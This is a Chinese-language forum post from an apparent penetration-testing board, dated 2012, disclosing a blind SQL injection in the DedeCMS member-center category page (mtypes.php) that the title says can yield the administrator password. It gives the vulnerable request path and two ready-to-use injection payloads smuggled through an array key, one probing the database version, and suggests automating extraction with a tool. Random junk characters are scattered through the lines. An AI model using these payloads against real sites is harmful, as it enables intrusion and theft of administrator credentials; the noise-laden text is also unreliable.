中国网络渗透测试联盟

标题: DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码 [打印本页]

作者: admin    时间: 2012-12-20 08:08
标题: DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码
需要magic_quotes_gpc = Off,所以说是鸡肋啊., U# ~5 o  u; t! y; F- |- L

, k; d4 F) [# i+ t7 _ . K# G' e; _) z5 p# |
发生在数组key里的注射漏洞,有点意思.7 i/ t7 J7 C5 Y' C, s% U

' f# T- K, E3 Z* l/ z2 u这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
5 E  |7 U' v4 W# T
' M2 P9 V9 H* F' u6 lhttp://www.xxx.com /dede/member/mtypes.php?dopost=save( g. O' j3 C5 D

8 A0 ~' D  b- ]* a# cexploit:4 K# `1 _& g1 X- H
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
7 u# B* q" X0 d! G4 X7 L, Jmtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
' i6 M% G% r+ a. p- E




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2